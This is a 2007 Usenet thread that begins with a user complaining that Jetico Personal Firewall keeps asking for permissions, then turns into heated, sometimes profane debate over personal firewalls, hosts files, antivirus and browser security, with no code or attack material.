Jetico Personal Firewall freeware asks way to many questions

Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
Zone Alarm or Sygate Personal Firewall does)?

For example, when I run CCleaner freeware, Jetico is welcome to ask if I
want to run it but with the "remember" button set, Jetico should LEARN that
I want CCleaner to run without asking me again. Yet every time CCleaner
runs, Jetico asks me again (even with the Remember button selected).

Same thing with Firefox freeware, PeerGuardian freeware, Windows update,
etc.

There MUST be a way to gell Jetico Personal Firewall to just Remember
(really remember) the3 previous answer .. isn't there?

Re: Jetico Personal Firewall freeware asks way to many questions

Linda Sands wrote:


> There MUST be a way to gell Jetico Personal Firewall to just Remember
> (really remember) the3 previous answer .. isn't there?


Hm... why don't you simply uninstall it? Why did you even install it in
first place?

Re: Jetico Personal Firewall freeware asks way to many questions

In article <96sPi.1575$Pv2.1234@newssvr23.news.prodigy.net>,
lshorsetrainer@sbcglobal.net says...
> Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> Zone Alarm or Sygate Personal Firewall does)? [snip]
=======================
Same problem; I uninstalled it.

Same problem with Comodo, too; I uninstalled it.

Zone Alarm and Sygate both have become really bloated, and think too
long about things.

Currently using Netveda Safety Net, and am pleased with it. Only
8MB or so installed

Lord Possum

Re: Jetico Personal Firewall freeware asks way to many questions

Linda Sands wrote:
> Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> Zone Alarm or Sygate Personal Firewall does)?
>
> For example, when I run CCleaner freeware, Jetico is welcome to ask if I
> want to run it but with the "remember" button set, Jetico should LEARN that
> I want CCleaner to run without asking me again. Yet every time CCleaner
> runs, Jetico asks me again (even with the Remember button selected).
>
> Same thing with Firefox freeware, PeerGuardian freeware, Windows update,
> etc.
>
> There MUST be a way to gell Jetico Personal Firewall to just Remember
> (really remember) the3 previous answer .. isn't there?

you should read the documentation and edit the default optimum
protection security policy
or you can just use another security policy like allow all but that
sorta defeats the
purpose of a personal firewall

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

Re: Jetico Personal Firewall freeware asks way to many questions

In article ,
Lord_Possum@yahoo.com says...
> In article <96sPi.1575$Pv2.1234@newssvr23.news.prodigy.net>,
> lshorsetrainer@sbcglobal.net says...
> > Is there an easy way to get Jetico Personal Firewall to only ask ONCE (like
> > Zone Alarm or Sygate Personal Firewall does)? [snip]
> =======================
> Same problem; I uninstalled it.
>
> Same problem with Comodo, too; I uninstalled it.
>
> Zone Alarm and Sygate both have become really bloated, and think too
> long about things.
>
> Currently using Netveda Safety Net, and am pleased with it. Only
> 8MB or so installed

Is that particularly small for a Firewall? I'm not sure your description
of Sygate being "really bloated", is entirely accurate. I'm not pushing
or endorsing Sygate, but my installation is 12 megs. That's not that
bloated IMO. If it, or any software package, does what it advertises, 4
megs doesn't make THAT much of a difference. I've tried most "endorsed"
firewalls, but I always seem to "go back" to Sygate.

Al

>
> Lord Possum
>

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


> or you can just use another security policy like allow all but that
> sorta defeats the
> purpose of a personal firewall


AFAWK the purpose of a "personal firewall" is to fuck up the network
connection, which is obviously does.

Re: Jetico Personal Firewall freeware asks way to many questions

In article ,
al@aohell.com says...

>Is that particularly small for a Firewall? I'm not sure your
>description of Sygate being "really bloated", is entirely accurate.
>I'm not pushing or endorsing Sygate, but my installation is 12 megs.
>That's not that bloated IMO. If it, or any software package, does
>what it advertises, 4 megs doesn't make THAT much of a difference.
>I've tried most "endorsed" firewalls, but I always seem to "go
>back" to Sygate. Al
============================

One of the criteria I employ in judging a program's worth is not only
the installed size, but the amount of Registry entries, and the
number of functions requiring 'think' power ... a drain on RAM
resources. Sygate is heavy than many in that respect.

And, as far as installed size ... 12MB compared to 8MB tells me
immediately that Sygate is 50% bigger, while doing no more or any
better than what I use. That apparently will not mean much to those
who don't care how much room a program takes up, but the extra 4MB
means more of something else for me. And, in the end result, NetVeda
is faster.

Lord Possum

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

TEST POST - IGNORE

don't mind me

Re: Jetico Personal Firewall freeware asks way to many questions

In article ,
Lord_Possum@yahoo.com says...
> In article ,
> al@aohell.com says...
>
> >Is that particularly small for a Firewall? I'm not sure your
> >description of Sygate being "really bloated", is entirely accurate.
> >I'm not pushing or endorsing Sygate, but my installation is 12 megs.
> >That's not that bloated IMO. If it, or any software package, does
> >what it advertises, 4 megs doesn't make THAT much of a difference.
> >I've tried most "endorsed" firewalls, but I always seem to "go
> >back" to Sygate. Al
> ============================
>
> One of the criteria I employ in judging a program's worth is not only
> the installed size, but the amount of Registry entries, and the
> number of functions requiring 'think' power ... a drain on RAM
> resources. Sygate is heavy than many in that respect.
>
> And, as far as installed size ... 12MB compared to 8MB tells me
> immediately that Sygate is 50% bigger, while doing no more or any
> better than what I use. That apparently will not mean much to those
> who don't care how much room a program takes up, but the extra 4MB
> means more of something else for me. And, in the end result, NetVeda
> is faster.
>
> Lord Possum
>

I've had this conversation with others in the past and found that, with
the "right" equipment, 4megs of hard drive space and 2 or 3 megs of RAM
is not very much. I'm running a 2.8GHz Pentium D with 2 Gigs of RAM. I
know not everyone has these resources, but I believe most people
frequenting this newsgroup looking for software, are probably people
that are pretty computer savvy and do have newer hardware which will run
most any of the software being discussed about here. It seems apropos
that someone here could come up with a list of software with attributes
pertaining to RAM and hard drive space usage. I'm sure there's a website
that does this, but I'm not familiar with one.

Al

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

Re: Jetico Personal Firewall freeware asks way to many questions

hmmm@hmmm.org wrote:

> Aaron wrote in
> news:Xns99C8A3502A20Faaronnewsgroup@85.214.62.108:
>
>> Moreover OA is not just a firewall but includes HIPS (but so does the
>> Comodo v3 but that's in beta). I personally find OA one of the more
>> usable HIPS for ordinary users.


HIPS is nonsense, and even HIDS is for anyone but ordinary users. At any
rate, the horribly broken and unsuable software products you're discussing
only include signature-based engines, which is quite useless.

> OA also gets an excellent rating from Matousec.


Hm... isn't that rather a bad thing?

> Let's see what the free
> version gets. ZA Pro has a very good rating while ZA free has a very poor
> rating. The latest version of ZA Pro uses about 80 mg ram!


WTF? I knew this software was totally bad, but THAT bad...

Re: Jetico Personal Firewall freeware asks way to many questions

Post removed (X-No-Archive: yes)

Re: TEST POST - IGNORE

"Double Z" wrote in
news:TM2dnTqNvcavjYzanZ2dneKdnZydnZ2d@giganews.com:

> don't mind me


ok


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

Lord Possum wrote:
> In article ,
> al@aohell.com says...
>
>> Is that particularly small for a Firewall? I'm not sure your
>> description of Sygate being "really bloated", is entirely accurate.
>> I'm not pushing or endorsing Sygate, but my installation is 12 megs.
>> That's not that bloated IMO. If it, or any software package, does
>> what it advertises, 4 megs doesn't make THAT much of a difference.
>> I've tried most "endorsed" firewalls, but I always seem to "go
>> back" to Sygate. Al
> ============================
>
> One of the criteria I employ in judging a program's worth is not only
> the installed size, but the amount of Registry entries, and the
> number of functions requiring 'think' power ... a drain on RAM
> resources. Sygate is heavy than many in that respect.
>
> And, as far as installed size ... 12MB compared to 8MB tells me
> immediately that Sygate is 50% bigger, while doing no more or any
> better than what I use. That apparently will not mean much to those
> who don't care how much room a program takes up, but the extra 4MB
> means more of something else for me. And, in the end result, NetVeda
> is faster.
>
> Lord Possum

What version of sygate are you referring too. 5.5.2710 is not bloated in
my opinion.

Re: Jetico Personal Firewall freeware asks way to many questions

In comp.security.firewalls Gary wrote:
> Lord Possum wrote:
>> One of the criteria I employ in judging a program's worth is not only
>> the installed size, but the amount of Registry entries, and the
>> number of functions requiring 'think' power ... a drain on RAM
>> resources. Sygate is heavy than many in that respect.
>>
>> And, as far as installed size ... 12MB compared to 8MB tells me
>> immediately that Sygate is 50% bigger, while doing no more or any
>> better than what I use. That apparently will not mean much to those
>> who don't care how much room a program takes up, but the extra 4MB
>> means more of something else for me. And, in the end result, NetVeda
>> is faster.
>
> What version of sygate are you referring too. 5.5.2710 is not bloated
> in my opinion.

It just has serious design flaws and won't receive any bugfixes anymore.
Some qualification for a "security" product.

cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich

Re: Jetico Personal Firewall freeware asks way to many questions

Ansgar -59cobalt- Wiechers after much
thought,came up with this jewel in news:fg2n7nUkp7L2@news.in-ulm.de:

> In comp.security.firewalls Gary wrote:
>> Lord Possum wrote:
>>> One of the criteria I employ in judging a program's worth is not
>>> only the installed size, but the amount of Registry entries, and
>>> the number of functions requiring 'think' power ... a drain on
>>> RAM resources. Sygate is heavy than many in that respect.
>>>
>>> And, as far as installed size ... 12MB compared to 8MB tells me
>>> immediately that Sygate is 50% bigger, while doing no more or
>>> any better than what I use. That apparently will not mean much
>>> to those who don't care how much room a program takes up, but
>>> the extra 4MB means more of something else for me. And, in the
>>> end result, NetVeda is faster.
>>
>> What version of sygate are you referring too. 5.5.2710 is not
>> bloated in my opinion.
>
> It just has serious design flaws and won't receive any bugfixes
> anymore. Some qualification for a "security" product.
>
> cu
> 59cobalt

Software "firewall" is not a real firewall and a waste of resources.
A router/harding your system/safe-hex is the way to go.
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Gary wrote:


> What version of sygate are you referring too. 5.5.2710 is not bloated in
> my opinion.


Sygate is bloated by design.

Re: Jetico Personal Firewall freeware asks way to many questions

Max M.Wachtel III wrote:


> Software "firewall" is not a real firewall and a waste of resources.


Right start, wrong conclusion. Just because it isn't a firewall doesn't mean
that it's not a security concept or can't be part of it. Indeed it is a
host-based packet filter, and, if used correctly (which already excludes all
the common "personal firewall" stuff) and not being too broken (again this
excludes all the common nonsense) can achieve a certain gain of security.

> A router/harding your system/safe-hex is the way to go.


The common SOHO router stuff is neither a firewall nor is it suitable to
implement a routing firewall.

Re: Jetico Personal Firewall freeware asks way to many questions

On Sun, 28 Oct 2007 22:37:15 +0100, Sebastian G. wrote:

> > Software "firewall" is not a real firewall and a waste of resources.

> Right start, wrong conclusion. Just because it isn't a firewall doesn't mean
> that it's not a security concept or can't be part of it. Indeed it is a
> host-based packet filter, and, if used correctly (which already excludes all
> the common "personal firewall" stuff) and not being too broken (again this
> excludes all the common nonsense) can achieve a certain gain of security.

Can you suggest alternative software other than the common "personal
firewall" stuff that will achieve a certain gain of security (on a
Windows OS) ? Tnx.

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5okdovFn7fe1U1@mid.dfncis.de:

> Max M.Wachtel III wrote:
>
>
>> Software "firewall" is not a real firewall and a waste of
>> resources.
>
>
> Right start, wrong conclusion. Just because it isn't a firewall
> doesn't mean that it's not a security concept or can't be part of
> it. Indeed it is a host-based packet filter, and, if used
> correctly (which already excludes all the common "personal
> firewall" stuff) and not being too broken (again this excludes all
> the common nonsense) can achieve a certain gain of security.
>
>> A router/harding your system/safe-hex is the way to go.
>
>
> The common SOHO router stuff is neither a firewall nor is it
> suitable to implement a routing firewall.

Your correct. I think a router provides better protection than using
a software firewall(some routers include a packet filter). And
turning off un-needed services,using a more secure e-mail
client/browser(like Thunderbird,Firefox) is better than relying on a
software firewall alone.
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

"s|b" after much thought,came up with this
jewel in news:Jy7Vi.179033$nI4.8773744@phobos.telenet-ops.be:

> On Sun, 28 Oct 2007 22:37:15 +0100, Sebastian G. wrote:
>
>> > Software "firewall" is not a real firewall and a waste of
>> > resources.
>
>> Right start, wrong conclusion. Just because it isn't a firewall
>> doesn't mean that it's not a security concept or can't be part of
>> it. Indeed it is a host-based packet filter, and, if used
>> correctly (which already excludes all the common "personal
>> firewall" stuff) and not being too broken (again this excludes
>> all the common nonsense) can achieve a certain gain of security.
>
> Can you suggest alternative software other than the common
> "personal firewall" stuff that will achieve a certain gain of
> security (on a Windows OS) ? Tnx.
>

Here is a good start-
MVPS hosts file
Firefox with NoScript and AdBlock installed
a good AV solution(like NOD32)
Spyware Blaster
Spybot Search+Destroy immunization
Turn off Windows Messenger
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

On Sun, 28 Oct 2007 22:33:53 GMT, Max M.Wachtel III wrote:

> Here is a good start-
> MVPS hosts file

Already using it.

> Firefox with NoScript and AdBlock installed

Already using it.

> a good AV solution(like NOD32)

I use Avast, but if I want to stick with freeware, then I'd probably be
better off with Avira Antivir.

> Spyware Blaster

Never used it.

> Spybot Search+Destroy immunization

Already using it.

> Turn off Windows Messenger

First thing I did when started this PC.

Anything else?

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

s|b wrote:


> Can you suggest alternative software other than the common "personal
> firewall" stuff that will achieve a certain gain of security (on a
> Windows OS) ? Tnx.


WinIPFW
(but only the latest SVN snapshot + some security fixes)

Re: Jetico Personal Firewall freeware asks way to many questions

Max M.Wachtel III wrote:


> Here is a good start-
> MVPS hosts file


A very bad start for a proposedly good start. What should this shit be good
for, other than fucking up the system?

> Firefox with NoScript and AdBlock installed


AdBlock is not security relevant. And, of course, what about Firefox? Even
NoScript can't make it any less broken. If you really like a Mozilla core,
take Mozilla SeaMonkey.

> a good AV solution(like NOD32)


This is not even a solution at all.

> Spyware Blaster


Oh please...

> Spybot Search+Destroy immunization


OH PLEASE...

> Turn off Windows Messenger


Eh... yeah? Of course, intentionally running an insecure-by-design software
is never a good idea.

Re: Jetico Personal Firewall freeware asks way to many questions

s|b wrote:


> Anything else?

Yes. Please flatten and rebuild your system. You broke it.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with
this jewel in news:5okkncFn7a1hU2@mid.dfncis.de:

> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this
> shit be good for, other than fucking up the system?

what???? a good hosts file doesn't f*ckup anything.

>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant.

I just have no use for unsolicited ads...

> And, of course, what about
> Firefox? Even NoScript can't make it any less broken.

for control of javascript....
> If you
> really like a Mozilla core, take Mozilla SeaMonkey.
I use Portable Apps and SM is not yet available.

>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
what do you use?
>
>> Spyware Blaster
>> Spybot Search+Destroy immunization

any added protection that uses no extra resources is a good thing.

>> Turn off Windows Messenger
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.


Why do you say anything is broken????
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." after much thought,came up with this
jewel in news:5n9mmpFh72sbU1@mid.dfncis.de:

> goarilla wrote:
>
>
>> or you can just use another security policy like allow all but
that
>> sorta defeats the
>> purpose of a personal firewall
>
>
> AFAWK the purpose of a "personal firewall" is to fuck up the
network
> connection, which is obviously does.
>

I have yet to put anyone in my killfile but you are getting close.
You don't happen to be a 3rd cousin of pcbutts?
max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this shit be
> good for, other than fucking up the system?
>

what ???
common i know lots of entries pointing to localhost is a cat and mouse game
at best but still ...

>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant. And, of course, what about Firefox?
> Even NoScript can't make it any less broken. If you really like a
> Mozilla core, take Mozilla SeaMonkey.
>

yes firefox is well ... a horrible code base but besides opera
are there really any good standards compliant (sort of) browsers out there
besides SM shares a LOT of that horrible code base
how is firefox broken ?

>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
>

true but NOD32 is the nicest of all PAV solutions (personal anti-virus :D)

>> Spyware Blaster
>
>
> Oh please...
>
>> Spybot Search+Destroy immunization
>
>
> OH PLEASE...
>
>> Turn off Windows Messenger
>
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.

are you against IM or just against MSN + MSNP ?

Re: Jetico Personal Firewall freeware asks way to many questions

Max M.Wachtel III wrote:

>>> MVPS hosts file
>>
>> A very bad start for a proposedly good start. What should this
>> shit be good for, other than fucking up the system?
>
> what???? a good hosts file doesn't f*ckup anything.


It does. It slows down the resolver and, in case of Windows, even
partitially breaks it. Aside from that, it's simply superfluos.

Even further, it simply doesn't work, as a normal user doesn't have write
access to the HOSTS file, and doesn't have the privilege to restart the
system either - neither would this be reasonable.

>> If you
>> really like a Mozilla core, take Mozilla SeaMonkey.
> I use Portable Apps and SM is not yet available.


Mozilla SeaMonkey is profile-portable by design.

>>> a good AV solution(like NOD32)
>>
>> This is not even a solution at all.
> what do you use?


A real solution: a global non-exec policy enforced by the kernel.

>>> Spyware Blaster
>>> Spybot Search+Destroy immunization
>
> any added protection that uses no extra resources is a good thing.


Any added software increases complexity and therefore decreases security.
Unless it can actually justify this, it is a bad thing. Spyware scanners
definitely are bad, and this immunization stuff has only one purpose:
fucking up the system.

> Why do you say anything is broken????


Because it usually is. Just like your concept.

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


> common i know lots of entries pointing to localhost is a cat and mouse game
> at best but still ...


it slows down the resolver and, in case of Windows, partitially breaks it.
Updating the HOSTS file requires write access that a normal user doesn't
have there, and an unwanted restart.

> yes firefox is well ... a horrible code base but besides opera
> are there really any good standards compliant (sort of) browsers out there
> besides SM shares a LOT of that horrible code base


Hm? The horrible code of Firefox starts where the common base ends.

> how is firefox broken ?


Just one keyword: Global Namespace Pollution

> true but NOD32 is the nicest of all PAV solutions (personal anti-virus :D)


So what? I'd say my trash can is the most beautiful one in the area. Yet
it's full of garbage and stinks.

> are you against IM or just against MSN + MSNP ?


Not even against the MSN IM protocol, but you should use an IM
implementation that isn't designed to execute arbitrary commands of the
attackers choice by default - which applies to Windows Messenger, MSN
Messenger, MSN Explorer, Yahoo Messenger, ICQ/Lite and AIM. Quite strange
that all the "official" clients are all broken by design, and the
third-party implementations are the only safe ones...

Re: Jetico Personal Firewall freeware asks way to many questions

Max M.Wachtel III wrote:

> I have yet to put anyone in my killfile but you are getting close.
> You don't happen to be a 3rd cousin of pcbutts?
> max

No, don't do that - Seb's our resident 'Grumpy Old Man' and we love him
dearly on this NG!

Jim Ford

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> goarilla wrote:
>
>
>> common i know lots of entries pointing to localhost is a cat and mouse
>> game
>> at best but still ...
>
>
> it slows down the resolver and, in case of Windows, partitially breaks
> it. Updating the HOSTS file requires write access that a normal user
> doesn't have there, and an unwanted restart.
>

never had a problem with it on a win xp machine
but i don't really use the machine, my sister does

>> yes firefox is well ... a horrible code base but besides opera
>> are there really any good standards compliant (sort of) browsers out
>> there
>> besides SM shares a LOT of that horrible code base
>
>
> Hm? The horrible code of Firefox starts where the common base ends.

XUL is a big bloated piece of crap

>
>> how is firefox broken ?
>
>
> Just one keyword: Global Namespace Pollution
>
>> true but NOD32 is the nicest of all PAV solutions (personal anti-virus
>> :D)
>
>
> So what? I'd say my trash can is the most beautiful one in the area. Yet
> it's full of garbage and stinks.
>

you may talk all big and mighty but you're probably working with homogenous
network environments in which ADS,group policy, proxy servers, etc, ...
can be implemented
sadly this isn't the case in 99,99 % of the home LAN environments and in
which NOD32 is really really nice
although it's a band-aid

>> are you against IM or just against MSN + MSNP ?
>
>
> Not even against the MSN IM protocol, but you should use an IM
> implementation that isn't designed to execute arbitrary commands of the
> attackers choice by default - which applies to Windows Messenger, MSN
> Messenger, MSN Explorer, Yahoo Messenger, ICQ/Lite and AIM. Quite
> strange that all the "official" clients are all broken by design, and
> the third-party implementations are the only safe ones...

true i use biltlebee + irssi

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


> XUL is a big bloated piece of crap


Quite the contrary. It allows for reference safety, type safety and contract
enforcement, and is still very fast due to JIT. One could compare it to
Java, or rather Python (because it allows on-the-fly changes).

>> So what? I'd say my trash can is the most beautiful one in the area. Yet
>> it's full of garbage and stinks.
>>
>
> you may talk all big and mighty but you're probably working with homogenous
> network environments in which ADS,group policy, proxy servers, etc, ...
> can be implemented


I wouldn't call a mixture of SunRay with Solaris and Debian Linux, x86 with
Debian and Windows 2000 + XP homogenous.
But why do you name group policy? This is, by design, not a security measure.

> sadly this isn't the case in 99,99 % of the home LAN environments and in
> which NOD32 is really really nice
> although it's a band-aid


As you say: it's a band-aid. Nothing more. Security starts with addressing
the causing, not cascading the symptoms. Especially since the main problem,
lacking user education, is even further amplified.

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


> XUL is a big bloated piece of crap


Quite the contrary. It allows for reference safety, type safety and contract
enforcement, and is still very fast due to JIT. One could compare it to
Java, or rather Python (because it allows on-the-fly changes).

>> So what? I'd say my trash can is the most beautiful one in the area. Yet
>> it's full of garbage and stinks.
>>
>
> you may talk all big and mighty but you're probably working with homogenous
> network environments in which ADS,group policy, proxy servers, etc, ...
> can be implemented


I wouldn't call a mixture of SunRay with Solaris and Debian Linux, x86 with
Debian and Windows 2000 + XP homogenous.
But why do you name group policy? This is, by design, not a security measure.

> sadly this isn't the case in 99,99 % of the home LAN environments and in
> which NOD32 is really really nice
> although it's a band-aid


As you say: it's a band-aid. Nothing more. Security starts with addressing
the causing, not cascading the symptoms. Especially since the main problem,
lacking user education, is even further amplified.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> goarilla wrote:
>
>
>> XUL is a big bloated piece of crap
>
>
> Quite the contrary. It allows for reference safety, type safety and
> contract enforcement, and is still very fast due to JIT. One could
> compare it to Java, or rather Python (because it allows on-the-fly
> changes).
>
>>> So what? I'd say my trash can is the most beautiful one in the area.
>>> Yet it's full of garbage and stinks.
>>>
>>
>> you may talk all big and mighty but you're probably working with
>> homogenous
>> network environments in which ADS,group policy, proxy servers, etc,
>> ... can be implemented
>
>
> I wouldn't call a mixture of SunRay with Solaris and Debian Linux, x86
> with Debian and Windows 2000 + XP homogenous.
> But why do you name group policy? This is, by design, not a security
> measure.
>
>> sadly this isn't the case in 99,99 % of the home LAN environments and
>> in which NOD32 is really really nice
>> although it's a band-aid
>
>
> As you say: it's a band-aid. Nothing more. Security starts with
> addressing the causing, not cascading the symptoms. Especially since the
> main problem, lacking user education, is even further amplified.

ok what would you do when some of your stupid users
gets a virus ? reset a known good image ? that only works
if you have a homogenous windows env.

well not quite but if you have lots of different pc's with windows it's
a lot harder because you have
to manage a lot of different images

and what's the causing of security problems beside the user ?

Re: Jetico Personal Firewall freeware asks way to many questions

On Mon, 29 Oct 2007 00:37:01 +0100, Sebastian G. wrote:

> > Anything else?

> Yes. Please flatten and rebuild your system. You broke it.

That's _really_ helpful. Danke!

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

On Mon, 29 Oct 2007 00:33:41 +0100, Sebastian G. wrote:

> WinIPFW
> (but only the latest SVN snapshot + some security fixes)

Thanks, I'll take a look at it.

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

goarilla wrote:


> ok what would you do when some of your stupid users
> gets a virus?


Depends on which systems. Those with higher security margins have a global
no-exec policy implemented, thus they simply can't anything but the
preinstalled software, and as long as this is up-to-date an in-memory
process compromise of the network is extremely unlikely.

On those with lesser security margin: Delete all programs and
script-relevant setting, if necessary restore their settings and their data
from the latest backup.

> well not quite but if you have lots of different pc's with windows it's
> a lot harder because you have
> to manage a lot of different images


Why are you always coming up with images? A user running malicious software
only compromises all the programs and the data he had access to, which is,
beside some necessarily shared data, only his own data. He can't damage the
data of other user, and neither the system.

> and what's the causing of security problems beside the user ?


Hardware errors. This is what the restore images are intended for: getting
the old system running on the new hardware again as soon as possible.

Re: Jetico Personal Firewall freeware asks way to many questions

s|b wrote:

> On Mon, 29 Oct 2007 00:37:01 +0100, Sebastian G. wrote:
>
>>> Anything else?
>
>> Yes. Please flatten and rebuild your system. You broke it.
>
> That's _really_ helpful. Danke!

According to all the damage that you claimed to have done to your system, I
don't see any reasonable chance to get it up running normally and then even
securing it without a complete reinstall. The next time you should think
very very very careful about every non-user-specific change that you
introduce to the system, at best twice, before you most likely discard it as
a stupid idea.

Re: Jetico Personal Firewall freeware asks way to many questions

Sebastian G. wrote:
> goarilla wrote:
>
>
>> ok what would you do when some of your stupid users
>> gets a virus?
>
>
> Depends on which systems. Those with higher security margins have a
> global no-exec policy implemented, thus they simply can't anything but
> the preinstalled software, and as long as this is up-to-date an
> in-memory process compromise of the network is extremely unlikely.
>

how does one do that ?
have any concrete information pertaining these security measures ?

> On those with lesser security margin: Delete all programs and
> script-relevant setting, if necessary restore their settings and their
> data from the latest backup.
>
>> well not quite but if you have lots of different pc's with windows
>> it's a lot harder because you have
>> to manage a lot of different images
>
>
> Why are you always coming up with images? A user running malicious
> software only compromises all the programs and the data he had access
> to, which is, beside some necessarily shared data, only his own data. He
> can't damage the data of other user, and neither the system.
>

in a perfect world yes
that's how i do it here
and well it's not uncommon for malware to use local (root) exploits
to escalate privilege

>> and what's the causing of security problems beside the user ?
>
>
> Hardware errors. This is what the restore images are intended for:
> getting the old system running on the new hardware again as soon as
> possible.

huh please explain. do you have some information on how to create
'restore images' since when ... i think image i think hardware specific
root filesystem (windows)

Re: Jetico Personal Firewall freeware asks way to many questions

On Tue, 30 Oct 2007 01:18:02 +0100, Sebastian G. wrote:

> According to all the damage that you claimed to have done to your system, I
> don't see any reasonable chance to get it up running normally and then even
> securing it without a complete reinstall. The next time you should think
> very very very careful about every non-user-specific change that you
> introduce to the system, at best twice, before you most likely discard it as
> a stupid idea.

I'm quite happy with my system, so there's really no need for you to
sulk about it...

--
s|b

Re: Jetico Personal Firewall freeware asks way to many questions

"Max M.Wachtel III" wrote in
news:Xns99D7A575FF87Ewhatsinaname@207.115.17.102:

> Ansgar -59cobalt- Wiechers after much
> thought,came up with this jewel in news:fg2n7nUkp7L2@news.in-ulm.de:
>
>> In comp.security.firewalls Gary wrote:
>>> Lord Possum wrote:
>>>> One of the criteria I employ in judging a program's worth is not
>>>> only the installed size, but the amount of Registry entries, and
>>>> the number of functions requiring 'think' power ... a drain on
>>>> RAM resources. Sygate is heavy than many in that respect.
>>>>
>>>> And, as far as installed size ... 12MB compared to 8MB tells me
>>>> immediately that Sygate is 50% bigger, while doing no more or
>>>> any better than what I use. That apparently will not mean much
>>>> to those who don't care how much room a program takes up, but
>>>> the extra 4MB means more of something else for me. And, in the
>>>> end result, NetVeda is faster.
>>>
>>> What version of sygate are you referring too. 5.5.2710 is not
>>> bloated in my opinion.
>>
>> It just has serious design flaws and won't receive any bugfixes
>> anymore. Some qualification for a "security" product.
>>
>> cu
>> 59cobalt
>
> Software "firewall" is not a real firewall and a waste of resources.

I wouldn't outright say a waste of resources, you can use one to keep
some applications from calling home.. for whatever reason. :)

> A router/harding your system/safe-hex is the way to go.
> max

Agreed.



--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5okkncFn7a1hU2@mid.dfncis.de:

> Max M.Wachtel III wrote:
>
>
>> Here is a good start-
>> MVPS hosts file
>
>
> A very bad start for a proposedly good start. What should this shit be
> good for, other than fucking up the system?
>
>> Firefox with NoScript and AdBlock installed
>
>
> AdBlock is not security relevant. And, of course, what about Firefox?
> Even NoScript can't make it any less broken. If you really like a
> Mozilla core, take Mozilla SeaMonkey.
>
>> a good AV solution(like NOD32)
>
>
> This is not even a solution at all.
>
>> Spyware Blaster
>
>
> Oh please...
>
>> Spybot Search+Destroy immunization
>
>
> OH PLEASE...
>
>> Turn off Windows Messenger
>
>
> Eh... yeah? Of course, intentionally running an insecure-by-design
> software is never a good idea.
>

You've got my curiosity. What problem do you have with the listed
applications?

And, you mentioned most router's these days aren't in fact firewalls. I'm
fairly certain this Linksys router does indeed have a firewall. Can you
elaborate on what specifically you are calling a firewall?


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt

Re: Jetico Personal Firewall freeware asks way to many questions

"Sebastian G." wrote in
news:5olhodFnfd9dU1@mid.dfncis.de:

> Max M.Wachtel III wrote:
>
>>>> MVPS hosts file
>>>
>>> A very bad start for a proposedly good start. What should this
>>> shit be good for, other than fucking up the system?
>>
>> what???? a good hosts file doesn't f*ckup anything.
>
>
